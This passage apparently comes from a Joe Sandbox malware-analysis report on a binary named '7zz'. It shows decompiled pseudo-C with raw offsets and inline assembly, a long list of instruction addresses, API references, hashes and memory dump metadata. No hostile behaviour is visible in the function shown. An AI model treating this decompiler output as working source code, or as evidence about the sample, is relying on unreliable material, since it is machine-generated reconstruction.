					_push(0x28);
					 *((intOrPtr*)(_t876 + 8)) = _t895 - 0x5c;
					 *((intOrPtr*)(_t876 + 0x10)) =  *((intOrPtr*)(_t895 + 0xc));
					 *(_t876 + 0x14) =  *(_t895 + 0x10);
					 *((intOrPtr*)(_t895 + 0xc)) =  *((intOrPtr*)(_t895 + 0xc)) +  *_t893;
					 *(_t895 - 4) = 2;
					asm("adc [ebp+0x10], ecx");
					_t697 = L004079F2();
					if(_t697 == _t713) {
						_t894 = 0;
						__eflags = 0;
					} else {
						 *(_t697 + 4) = _t713;
						 *(_t697 + 8) = _t713;
						 *_t697 = 0x47b218;
						_t894 = _t697;
					}
					 *(_t895 - 0x1c) = _t894;
					if(_t894 != _t713) {
						 *((intOrPtr*)( *_t894 + 4))(_t894);
					}
					_t34 = _t894 + 8; // 0x8
					 *(_t895 - 4) = 3;
					E0040C9B4(_t34, _t876);
					_t854 =  *(_t895 + 8);
					 *((intOrPtr*)(_t894 + 0x10)) =  *_t854;
					 *((intOrPtr*)(_t894 + 0x14)) =  *((intOrPtr*)(_t854 + 4));
					 *(_t894 + 0x18) = _t713;
					_push(_t895 - 0x1c);
					 *(_t894 + 0x1c) = _t713;
					 *(_t894 + 0x20) = _t713;
					E00424385(_t895 - 0x38);
					_t702 =  *(_t895 - 0x1c);
					 *(_t895 - 4) = 2;
					if(_t702 != _t713) {
						 *((intOrPtr*)( *_t702 + 8))(_t702);
					}
					 *(_t895 - 4) = 1;
					if(_t876 != _t713) {
						 *((intOrPtr*)( *_t876 + 8))(_t876);
					}
					 *(_t895 - 0x10) =  *(_t895 - 0x10) + 1;
					 *(_t895 + 8) =  *(_t895 + 8) + 8;
					if( *(_t895 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 0x30))) {
						_t893 =  *(_t895 + 8);
						goto L4;
					}
					_t874 =  *(_t895 - 0x14);
					goto L20;
				}
			}





































































                                                                                                                                    0x004264fc
                                                                                                                                    0x00426509
                                                                                                                                    0x0042650d
                                                                                                                                    0x00426511
                                                                                                                                    0x0042651b
                                                                                                                                    0x00426bfc
                                                                                                                                    0x00426bfc
                                                                                                                                    0x004270f6
                                                                                                                                    0x004270fc
                                                                                                                                    0x00427104
                                                                                                                                    0x00427104
                                                                                                                                    0x00426524
                                                                                                                                    0x00426529
                                                                                                                                    0x0042652b
                                                                                                                                    0x00426530
                                                                                                                                    0x0042653a
                                                                                                                                    0x0042653d
                                                                                                                                    0x00426540
                                                                                                                                    0x0042654b
                                                                                                                                    0x0042654f
                                                                                                                                    0x00426557
                                                                                                                                    0x0042655c
                                                                                                                                    0x00426649
                                                                                                                                    0x00426655
                                                                                                                                    0x00426658
                                                                                                                                    0x00426663
                                                                                                                                    0x00426667
                                                                                                                                    0x00426674
                                                                                                                                    0x00426678
                                                                                                                                    0x0042667f
                                                                                                                                    0x0042669e
                                                                                                                                    0x004266a1
                                                                                                                                    0x004266a6
                                                                                                                                    0x004266a9
                                                                                                                                    0x004266ae
                                                                                                                                    0x004266b3
                                                                                                                                    0x004266b6
                                                                                                                                    0x004266b6
                                                                                                                                    0x004266bb
                                                                                                                                    0x004266bd
                                                                                                                                    0x004266c2
                                                                                                                                    0x004266c8
                                                                                                                                    0x004266cd
                                                                                                                                    0x004266d1
                                                                                                                                    0x004266dc
                                                                                                                                    0x004266dc
                                                                                                                                    0x004266d3
                                                                                                                                    0x004266d5
                                                                                                                                    0x004266d5
                                                                                                                                    0x004266e1
                                                                                                                                    0x004266e5
                                                                                                                                    0x004266e8
                                                                                                                                    0x004266ed
                                                                                                                                    0x004266f2
                                                                                                                                    0x004266f9
                                                                                                                                    0x004266f9
                                                                                                                                    0x004266f4
                                                                                                                                    0x004266f4
                                                                                                                                    0x004266f4
                                                                                                                                    0x004266fb
                                                                                                                                    0x004266fb
                                                                                                                                    0x0042670c
                                                                                                                                    0x0042670e
                                                                                                                                    0x00426710
                                                                                                                                    0x0042675a
                                                                                                                                    0x0042675d
                                                                                                                                    0x00426760
                                                                                                                                    0x00426843
                                                                                                                                    0x0042684d
                                                                                                                                    0x00426852
                                                                                                                                    0x00426855
                                                                                                                                    0x0042685a
                                                                                                                                    0x0042685d
                                                                                                                                    0x00426860
                                                                                                                                    0x00426863
                                                                                                                                    0x00426866
                                                                                                                                    0x00426869
                                                                                                                                    0x00426fc4
                                                                                                                                    0x00426fdd
                                                                                                                                    0x00426fe2
                                                                                                                                    0x00426fe5
                                                                                                                                    0x00426fed
                                                                                                                                    0x00426fed
                                                                                                                                    0x00426ff0
                                                                                                                                    0x00426ff3
                                                                                                                                    0x00427059
                                                                                                                                    0x0042705e
                                                                                                                                    0x00427071
                                                                                                                                    0x00427075
                                                                                                                                    0x0042707a
                                                                                                                                    0x0042707c
                                                                                                                                    0x0042707f
                                                                                                                                    0x0042709a
                                                                                                                                    0x004270a3
                                                                                                                                    0x004270a6
                                                                                                                                    0x004270c3
                                                                                                                                    0x004270c5
                                                                                                                                    0x004270c9
                                                                                                                                    0x004270d4
                                                                                                                                    0x004270d8
                                                                                                                                    0x004270e0
                                                                                                                                    0x004270e3
                                                                                                                                    0x004270e8
                                                                                                                                    0x004270e8
                                                                                                                                    0x004270e8
                                                                                                                                    0x004270ef
                                                                                                                                    0x004270f4
                                                                                                                                    0x004270f4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00427081
                                                                                                                                    0x00427081
                                                                                                                                    0x0042708f
                                                                                                                                    0x00427094
                                                                                                                                    0x00427095
                                                                                                                                    0x00427095
                                                                                                                                    0x00000000
                                                                                                                                    0x00426ff5
                                                                                                                                    0x00426ffb
                                                                                                                                    0x00426fff
                                                                                                                                    0x0042700a
                                                                                                                                    0x0042700e
                                                                                                                                    0x00427016
                                                                                                                                    0x0042701a
                                                                                                                                    0x00427023
                                                                                                                                    0x00427028
                                                                                                                                    0x0042702f
                                                                                                                                    0x00000000
                                                                                                                                    0x0042702f
                                                                                                                                    0x00426ff3
                                                                                                                                    0x0042686f
                                                                                                                                    0x00426872
                                                                                                                                    0x00426878
                                                                                                                                    0x00426884
                                                                                                                                    0x0042688d
                                                                                                                                    0x00426890
                                                                                                                                    0x0042689e
                                                                                                                                    0x004268a2
                                                                                                                                    0x004268a4
                                                                                                                                    0x004268a7
                                                                                                                                    0x004268a9
                                                                                                                                    0x004268db
                                                                                                                                    0x004268db
                                                                                                                                    0x004268dd
                                                                                                                                    0x004268e1
                                                                                                                                    0x004268e6
                                                                                                                                    0x004268e6
                                                                                                                                    0x004268e9
                                                                                                                                    0x004268ec
                                                                                                                                    0x00426931
                                                                                                                                    0x00426931
                                                                                                                                    0x00426934
                                                                                                                                    0x00426942
                                                                                                                                    0x00426946
                                                                                                                                    0x00426948
                                                                                                                                    0x0042694b
                                                                                                                                    0x0042694d
                                                                                                                                    0x00426a1a
                                                                                                                                    0x00426a1a
                                                                                                                                    0x00426a1c
                                                                                                                                    0x00426a20
                                                                                                                                    0x00426a25
                                                                                                                                    0x00426a25
                                                                                                                                    0x00426a28
                                                                                                                                    0x00426a2b
                                                                                                                                    0x00426a37
                                                                                                                                    0x00426a40
                                                                                                                                    0x00426a43
                                                                                                                                    0x00426a4d
                                                                                                                                    0x00426a5b
                                                                                                                                    0x00426a5f
                                                                                                                                    0x00426a64
                                                                                                                                    0x00426a73
                                                                                                                                    0x00426a77
                                                                                                                                    0x00426a85
                                                                                                                                    0x00426a8a
                                                                                                                                    0x00426a8d
                                                                                                                                    0x00426c06
                                                                                                                                    0x00000000
                                                                                                                                    0x00426a93
                                                                                                                                    0x00426a96
                                                                                                                                    0x00426a9c
                                                                                                                                    0x00426aac
                                                                                                                                    0x00426ab1
                                                                                                                                    0x00426ab4
                                                                                                                                    0x00426ab4
                                                                                                                                    0x00426ab4
                                                                                                                                    0x00426ab4
                                                                                                                                    0x00426c09
                                                                                                                                    0x00426c09
                                                                                                                                    0x00426c0c
                                                                                                                                    0x00426c0f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c15
                                                                                                                                    0x00426c15
                                                                                                                                    0x00426c15
                                                                                                                                    0x00426c18
                                                                                                                                    0x00426c1b
                                                                                                                                    0x00426c1d
                                                                                                                                    0x00426c34
                                                                                                                                    0x00426c34
                                                                                                                                    0x00426c34
                                                                                                                                    0x00426c37
                                                                                                                                    0x00426c37
                                                                                                                                    0x00426c39
                                                                                                                                    0x00426c4c
                                                                                                                                    0x00426c4f
                                                                                                                                    0x00426c52
                                                                                                                                    0x00426c54
                                                                                                                                    0x00426c6f
                                                                                                                                    0x00426c6f
                                                                                                                                    0x00426c6f
                                                                                                                                    0x00426c72
                                                                                                                                    0x00426c72
                                                                                                                                    0x00426c74
                                                                                                                                    0x00426f4d
                                                                                                                                    0x00426f51
                                                                                                                                    0x00426f5c
                                                                                                                                    0x00426f60
                                                                                                                                    0x00426f6b
                                                                                                                                    0x00426f6f
                                                                                                                                    0x00426f7a
                                                                                                                                    0x00426f7e
                                                                                                                                    0x00426f86
                                                                                                                                    0x00426f8a
                                                                                                                                    0x00426f93
                                                                                                                                    0x00426f98
                                                                                                                                    0x00426fa2
                                                                                                                                    0x00426fa9
                                                                                                                                    0x00426fae
                                                                                                                                    0x00426fb5
                                                                                                                                    0x00426fba
                                                                                                                                    0x00000000
                                                                                                                                    0x00426fba
                                                                                                                                    0x00426c7a
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c7a
                                                                                                                                    0x00426c56
                                                                                                                                    0x00426c59
                                                                                                                                    0x00426c5c
                                                                                                                                    0x00426c5e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c64
                                                                                                                                    0x00426c67
                                                                                                                                    0x00426c6a
                                                                                                                                    0x00426c6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c6d
                                                                                                                                    0x00426ce6
                                                                                                                                    0x00000000
                                                                                                                                    0x00426ce6
                                                                                                                                    0x00426c3e
                                                                                                                                    0x00426c42
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c42
                                                                                                                                    0x00426c1f
                                                                                                                                    0x00426c22
                                                                                                                                    0x00426c25
                                                                                                                                    0x00426c27
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c29
                                                                                                                                    0x00426c2c
                                                                                                                                    0x00426c2f
                                                                                                                                    0x00426c32
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c32
                                                                                                                                    0x00426c47
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c7d
                                                                                                                                    0x00426c87
                                                                                                                                    0x00426c8c
                                                                                                                                    0x00426c8f
                                                                                                                                    0x00426c92
                                                                                                                                    0x00426c95
                                                                                                                                    0x00426c95
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c15
                                                                                                                                    0x00426a8d
                                                                                                                                    0x00426953
                                                                                                                                    0x00426956
                                                                                                                                    0x00426958
                                                                                                                                    0x00426e07
                                                                                                                                    0x00426e09
                                                                                                                                    0x00426e0d
                                                                                                                                    0x00426e12
                                                                                                                                    0x00426e12
                                                                                                                                    0x00426e1b
                                                                                                                                    0x00426e1f
                                                                                                                                    0x00426e2a
                                                                                                                                    0x00426e2e
                                                                                                                                    0x00426e36
                                                                                                                                    0x00426e3a
                                                                                                                                    0x00426e43
                                                                                                                                    0x00426e48
                                                                                                                                    0x00426e4f
                                                                                                                                    0x00426e56
                                                                                                                                    0x00426f2e
                                                                                                                                    0x00426f31
                                                                                                                                    0x00426f36
                                                                                                                                    0x00426f3d
                                                                                                                                    0x00000000
                                                                                                                                    0x00426f3d
                                                                                                                                    0x0042695e
                                                                                                                                    0x00426968
                                                                                                                                    0x0042696f
                                                                                                                                    0x00426971
                                                                                                                                    0x00426973
                                                                                                                                    0x00426e63
                                                                                                                                    0x00426e69
                                                                                                                                    0x00426e6c
                                                                                                                                    0x00426e70
                                                                                                                                    0x00426e72
                                                                                                                                    0x00426e77
                                                                                                                                    0x00426e77
                                                                                                                                    0x00426e80
                                                                                                                                    0x00426e84
                                                                                                                                    0x00426e8f
                                                                                                                                    0x00426e93
                                                                                                                                    0x00426e9b
                                                                                                                                    0x00426e9f
                                                                                                                                    0x00426ea8
                                                                                                                                    0x00426ead
                                                                                                                                    0x00426eb4
                                                                                                                                    0x00000000
                                                                                                                                    0x00426eb4
                                                                                                                                    0x00426979
                                                                                                                                    0x0042697c
                                                                                                                                    0x0042697f
                                                                                                                                    0x0042698f
                                                                                                                                    0x00426993
                                                                                                                                    0x00426996
                                                                                                                                    0x004269a1
                                                                                                                                    0x004269a5
                                                                                                                                    0x004269a9
                                                                                                                                    0x004269ae
                                                                                                                                    0x004269b1
                                                                                                                                    0x004269b4
                                                                                                                                    0x004269de
                                                                                                                                    0x004269de
                                                                                                                                    0x004269e8
                                                                                                                                    0x004269eb
                                                                                                                                    0x004269ee
                                                                                                                                    0x004269f0
                                                                                                                                    0x004269f2
                                                                                                                                    0x00426ebd
                                                                                                                                    0x00426ec5
                                                                                                                                    0x00426ecc
                                                                                                                                    0x00426ed6
                                                                                                                                    0x00426edc
                                                                                                                                    0x00426edf
                                                                                                                                    0x00426ee3
                                                                                                                                    0x00426ee5
                                                                                                                                    0x00426eea
                                                                                                                                    0x00426eea
                                                                                                                                    0x00426ef3
                                                                                                                                    0x00426ef7
                                                                                                                                    0x00426f02
                                                                                                                                    0x00426f06
                                                                                                                                    0x00426f0e
                                                                                                                                    0x00426f12
                                                                                                                                    0x00426f1b
                                                                                                                                    0x00426f20
                                                                                                                                    0x00426f27
                                                                                                                                    0x00000000
                                                                                                                                    0x00426f27
                                                                                                                                    0x004269f8
                                                                                                                                    0x00426a00
                                                                                                                                    0x00426a07
                                                                                                                                    0x00426a11
                                                                                                                                    0x00426a17
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004269b6
                                                                                                                                    0x004269b6
                                                                                                                                    0x004269bf
                                                                                                                                    0x004269c1
                                                                                                                                    0x004269c5
                                                                                                                                    0x004269ca
                                                                                                                                    0x004269d2
                                                                                                                                    0x004269d9
                                                                                                                                    0x004269d9
                                                                                                                                    0x00000000
                                                                                                                                    0x004268ee
                                                                                                                                    0x004268ee
                                                                                                                                    0x004268f1
                                                                                                                                    0x004268ff
                                                                                                                                    0x00426903
                                                                                                                                    0x00426905
                                                                                                                                    0x00426908
                                                                                                                                    0x0042690a
                                                                                                                                    0x00426923
                                                                                                                                    0x00426923
                                                                                                                                    0x00426925
                                                                                                                                    0x00426929
                                                                                                                                    0x0042692e
                                                                                                                                    0x0042692e
                                                                                                                                    0x00000000
                                                                                                                                    0x00426929
                                                                                                                                    0x00426912
                                                                                                                                    0x00426915
                                                                                                                                    0x00426917
                                                                                                                                    0x0042691a
                                                                                                                                    0x00426d99
                                                                                                                                    0x00426d9c
                                                                                                                                    0x00426da0
                                                                                                                                    0x00426da2
                                                                                                                                    0x00426da7
                                                                                                                                    0x00426da7
                                                                                                                                    0x00426db0
                                                                                                                                    0x00426db4
                                                                                                                                    0x00426dbf
                                                                                                                                    0x00426dc3
                                                                                                                                    0x00426dcb
                                                                                                                                    0x00426dcf
                                                                                                                                    0x00426dd8
                                                                                                                                    0x00426ddd
                                                                                                                                    0x00426de7
                                                                                                                                    0x00426dee
                                                                                                                                    0x00426df3
                                                                                                                                    0x00426dfa
                                                                                                                                    0x00426dff
                                                                                                                                    0x00000000
                                                                                                                                    0x00426dff
                                                                                                                                    0x00426920
                                                                                                                                    0x00000000
                                                                                                                                    0x00426920
                                                                                                                                    0x004268ec
                                                                                                                                    0x004268ae
                                                                                                                                    0x004268b1
                                                                                                                                    0x004268b4
                                                                                                                                    0x004268b7
                                                                                                                                    0x00426ceb
                                                                                                                                    0x00426ced
                                                                                                                                    0x00426cf1
                                                                                                                                    0x00426cf6
                                                                                                                                    0x00426cf6
                                                                                                                                    0x00426cff
                                                                                                                                    0x00426d03
                                                                                                                                    0x00426d0e
                                                                                                                                    0x00426d12
                                                                                                                                    0x00426d1a
                                                                                                                                    0x00426d1e
                                                                                                                                    0x00426d27
                                                                                                                                    0x00426d2c
                                                                                                                                    0x00426d33
                                                                                                                                    0x00426b8c
                                                                                                                                    0x00426b8c
                                                                                                                                    0x00000000
                                                                                                                                    0x00426b8c
                                                                                                                                    0x004268ca
                                                                                                                                    0x004268cd
                                                                                                                                    0x004268cf
                                                                                                                                    0x004268d2
                                                                                                                                    0x00426d3f
                                                                                                                                    0x00426d42
                                                                                                                                    0x00426d46
                                                                                                                                    0x00426d48
                                                                                                                                    0x00426d4d
                                                                                                                                    0x00426d4d
                                                                                                                                    0x00426d56
                                                                                                                                    0x00426d5a
                                                                                                                                    0x00426d65
                                                                                                                                    0x00426d69
                                                                                                                                    0x00426d71
                                                                                                                                    0x00426d75
                                                                                                                                    0x00426d7e
                                                                                                                                    0x00426d83
                                                                                                                                    0x00426d8a
                                                                                                                                    0x00426d8d
                                                                                                                                    0x00000000
                                                                                                                                    0x00426d8d
                                                                                                                                    0x004268d8
                                                                                                                                    0x00000000
                                                                                                                                    0x00426c9e
                                                                                                                                    0x00426ca7
                                                                                                                                    0x00426cb3
                                                                                                                                    0x00426cbc
                                                                                                                                    0x00426cc0
                                                                                                                                    0x00426ccb
                                                                                                                                    0x00426ccf
                                                                                                                                    0x00426cd4
                                                                                                                                    0x00426cd5
                                                                                                                                    0x00426cd8
                                                                                                                                    0x00426cd8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426766
                                                                                                                                    0x00426766
                                                                                                                                    0x0042676f
                                                                                                                                    0x00426772
                                                                                                                                    0x00426775
                                                                                                                                    0x00426778
                                                                                                                                    0x0042677c
                                                                                                                                    0x00426782
                                                                                                                                    0x00426786
                                                                                                                                    0x00426788
                                                                                                                                    0x0042678d
                                                                                                                                    0x0042678f
                                                                                                                                    0x00426792
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426798
                                                                                                                                    0x0042679b
                                                                                                                                    0x0042679f
                                                                                                                                    0x004267a3
                                                                                                                                    0x004267d1
                                                                                                                                    0x004267d1
                                                                                                                                    0x004267d4
                                                                                                                                    0x00426b96
                                                                                                                                    0x00426b99
                                                                                                                                    0x00426b9d
                                                                                                                                    0x00426b9f
                                                                                                                                    0x00426ba4
                                                                                                                                    0x00426ba4
                                                                                                                                    0x00426bad
                                                                                                                                    0x00426bb1
                                                                                                                                    0x00426bbc
                                                                                                                                    0x00426bc0
                                                                                                                                    0x00426bc8
                                                                                                                                    0x00426bcc
                                                                                                                                    0x00426bd5
                                                                                                                                    0x00426bda
                                                                                                                                    0x00426be4
                                                                                                                                    0x00426beb
                                                                                                                                    0x00426bf0
                                                                                                                                    0x00426bf0
                                                                                                                                    0x00426bf0
                                                                                                                                    0x00426bf7
                                                                                                                                    0x00000000
                                                                                                                                    0x00426bf7
                                                                                                                                    0x004267e0
                                                                                                                                    0x004267e5
                                                                                                                                    0x004267e8
                                                                                                                                    0x004267f0
                                                                                                                                    0x004267f0
                                                                                                                                    0x004267f5
                                                                                                                                    0x004267fb
                                                                                                                                    0x004267fc
                                                                                                                                    0x00426801
                                                                                                                                    0x00426804
                                                                                                                                    0x00426808
                                                                                                                                    0x0042680a
                                                                                                                                    0x0042680f
                                                                                                                                    0x0042680f
                                                                                                                                    0x00426812
                                                                                                                                    0x00426815
                                                                                                                                    0x00426819
                                                                                                                                    0x0042681b
                                                                                                                                    0x00426820
                                                                                                                                    0x00426820
                                                                                                                                    0x00426823
                                                                                                                                    0x00426826
                                                                                                                                    0x0042682a
                                                                                                                                    0x0042682c
                                                                                                                                    0x00426831
                                                                                                                                    0x00426831
                                                                                                                                    0x00426834
                                                                                                                                    0x0042683a
                                                                                                                                    0x0042683d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042683d
                                                                                                                                    0x004267a5
                                                                                                                                    0x004267a9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004267ab
                                                                                                                                    0x004267ae
                                                                                                                                    0x004267b0
                                                                                                                                    0x00426b29
                                                                                                                                    0x00426b2c
                                                                                                                                    0x00426b30
                                                                                                                                    0x00426b32
                                                                                                                                    0x00426b37
                                                                                                                                    0x00426b3a
                                                                                                                                    0x00426b3a
                                                                                                                                    0x00426b3d
                                                                                                                                    0x00426b3f
                                                                                                                                    0x00426b43
                                                                                                                                    0x00426b48
                                                                                                                                    0x00426b48
                                                                                                                                    0x00426b51
                                                                                                                                    0x00426b55
                                                                                                                                    0x00426b60
                                                                                                                                    0x00426b64
                                                                                                                                    0x00426b6c
                                                                                                                                    0x00426b70
                                                                                                                                    0x00426b79
                                                                                                                                    0x00426b7e
                                                                                                                                    0x00426b85
                                                                                                                                    0x00000000
                                                                                                                                    0x00426b85
                                                                                                                                    0x004267ba
                                                                                                                                    0x004267bf
                                                                                                                                    0x004267c2
                                                                                                                                    0x004267ca
                                                                                                                                    0x004267ca
                                                                                                                                    0x00000000
                                                                                                                                    0x004267c2
                                                                                                                                    0x00426abe
                                                                                                                                    0x00426ac1
                                                                                                                                    0x00426ac5
                                                                                                                                    0x00426ac7
                                                                                                                                    0x00426acc
                                                                                                                                    0x00426acc
                                                                                                                                    0x00426acf
                                                                                                                                    0x00426ad2
                                                                                                                                    0x00426ad6
                                                                                                                                    0x00426ad8
                                                                                                                                    0x00426add
                                                                                                                                    0x00426add
                                                                                                                                    0x00426ae6
                                                                                                                                    0x00426aea
                                                                                                                                    0x00426af5
                                                                                                                                    0x00426af9
                                                                                                                                    0x00426b01
                                                                                                                                    0x00426b05
                                                                                                                                    0x00426b0e
                                                                                                                                    0x00426b13
                                                                                                                                    0x00426b1a
                                                                                                                                    0x00426b1d
                                                                                                                                    0x00000000
                                                                                                                                    0x00426712
                                                                                                                                    0x00426718
                                                                                                                                    0x0042671c
                                                                                                                                    0x00426727
                                                                                                                                    0x0042672b
                                                                                                                                    0x00426733
                                                                                                                                    0x00426737
                                                                                                                                    0x00426740
                                                                                                                                    0x00426745
                                                                                                                                    0x0042674c
                                                                                                                                    0x00426753
                                                                                                                                    0x00427036
                                                                                                                                    0x00427039
                                                                                                                                    0x0042703e
                                                                                                                                    0x00427045
                                                                                                                                    0x0042704a
                                                                                                                                    0x00000000
                                                                                                                                    0x0042704a
                                                                                                                                    0x00426710
                                                                                                                                    0x0042668a
                                                                                                                                    0x00426691
                                                                                                                                    0x00426693
                                                                                                                                    0x00426695
                                                                                                                                    0x00426698
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00426562
                                                                                                                                    0x00426562
                                                                                                                                    0x00426565
                                                                                                                                    0x0042656d
                                                                                                                                    0x0042656d
                                                                                                                                    0x0042656f
                                                                                                                                    0x00426577
                                                                                                                                    0x00426586
                                                                                                                                    0x00426586
                                                                                                                                    0x00426579
                                                                                                                                    0x00426579
                                                                                                                                    0x0042657c
                                                                                                                                    0x00426582
                                                                                                                                    0x00426582
                                                                                                                                    0x0042658a
                                                                                                                                    0x0042658d
                                                                                                                                    0x00426592
                                                                                                                                    0x00426592
                                                                                                                                    0x00426598
                                                                                                                                    0x0042659a
                                                                                                                                    0x004265a0
                                                                                                                                    0x004265a6
                                                                                                                                    0x004265ab
                                                                                                                                    0x004265b1
                                                                                                                                    0x004265b5
                                                                                                                                    0x004265b8
                                                                                                                                    0x004265c0
                                                                                                                                    0x004265d2
                                                                                                                                    0x004265d2
                                                                                                                                    0x004265c2
                                                                                                                                    0x004265c2
                                                                                                                                    0x004265c5
                                                                                                                                    0x004265c8
                                                                                                                                    0x004265ce
                                                                                                                                    0x004265ce
                                                                                                                                    0x004265d6
                                                                                                                                    0x004265d9
                                                                                                                                    0x004265de
                                                                                                                                    0x004265de
                                                                                                                                    0x004265e2
                                                                                                                                    0x004265e5
                                                                                                                                    0x004265e9
                                                                                                                                    0x004265ee
                                                                                                                                    0x004265f6
                                                                                                                                    0x004265fc
                                                                                                                                    0x004265ff
                                                                                                                                    0x00426602
                                                                                                                                    0x00426606
                                                                                                                                    0x00426609
                                                                                                                                    0x0042660c
                                                                                                                                    0x00426611
                                                                                                                                    0x00426614
                                                                                                                                    0x0042661a
                                                                                                                                    0x0042661f
                                                                                                                                    0x0042661f
                                                                                                                                    0x00426624
                                                                                                                                    0x00426628
                                                                                                                                    0x0042662d
                                                                                                                                    0x0042662d
                                                                                                                                    0x00426630
                                                                                                                                    0x00426639
                                                                                                                                    0x00426640
                                                                                                                                    0x0042656a
                                                                                                                                    0x00000000
                                                                                                                                    0x0042656a
                                                                                                                                    0x00426646
                                                                                                                                    0x00000000
                                                                                                                                    0x00426646

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004264FC
                                                                                                                                      • Part of subcall function 0042CD7D: __EH_prolog.LIBCMT ref: 0042CD82
                                                                                                                                      • Part of subcall function 00467C60: InitializeCriticalSection.KERNEL32(?,00000001,?,?,-00000016), ref: 00467C8E
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00426737
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00426A11
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B05
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426B70
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 00426BCC
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00426D1E
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00426D75
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00426DCF
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00426E3A
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00426E63
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00426E9F
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00426ED6
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00426F12
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 00426F8A
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0042701A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Delete$FreeString$H_prolog$Initialize
                                                                                                                                    • String ID: *$c[@
                                                                                                                                    • API String ID: 3004459923-117524647
                                                                                                                                    • Opcode ID: edc72c406ec778d2aecc03f19c1a68ce554b46ce03a6a889f79f8fafaea9eac1
                                                                                                                                    • Instruction ID: 54e86bbab3a080c51c4da8baaff600dccbbf03e7154ae3ec1f80e40b651aacad
                                                                                                                                    • Opcode Fuzzy Hash: edc72c406ec778d2aecc03f19c1a68ce554b46ce03a6a889f79f8fafaea9eac1
                                                                                                                                    • Instruction Fuzzy Hash: A1927D70900259EFCF10DFA4D584ADDBBB0BF14308F6584AEE449A7391CB789A89CF55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046FCD7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
